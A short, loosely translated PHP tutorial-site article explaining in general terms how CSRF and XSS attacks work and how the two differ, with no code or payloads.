The basic concept, abbreviation, and full name of CSRF
CSRF (Cross-site request forgery): Cross-site request forgery. (Recommended learning: PHP video tutorial)
PS: Be sure to remember the Chinese name. The full English name, if you can’t remember it, forget it.
CSRF attack principle
The user is a registered user of website A and logs in, so website A issues a cookie to the user.
As can be seen from the above figure, to complete a CSRF attack, the victim must meet two necessary conditions:
(1) Login is trusted Website A, and generate cookies locally. (If the user is not logged in to website A, then website B will prompt you to log in when requesting the API interface of website A during induction)
(2) Visit dangerous websites without logging out of A B (actually exploiting the vulnerability of website A).
When we talk about CSRF, we must make the above two points clear.
As a reminder, cookies ensure that users can be logged in, but website B cannot actually get cookies.
Basic concepts of XSS
XSS (Cross Site Scripting): Cross-domain scripting attack.
XSS attack principle
The core principle of XSS attack is: you do not need to do any login authentication, it will pass legal operations (such as entering in the url , enter in the comment box), inject scripts (maybe js, hmtl code blocks, etc.) into your page.
The final result may be:
Stealing cookies to destroy the normal structure of the page, inserting advertisements and other malicious content D-doss attacks
## The difference between #CSRF and XSS
Difference 1:
CSRF: The user needs to log in to website A first to obtain the cookie. XSS: No login required.Difference 2: (Difference in principle)
CSRF: It uses the vulnerability of website A itself to request the API of website A. XSS: Injects JS code into website A, and then executes the code in JS to tamper with the content of website A.The above is the detailed content of The difference between php csrf attack and xss attack. For more information, please follow other related articles on the PHP Chinese website!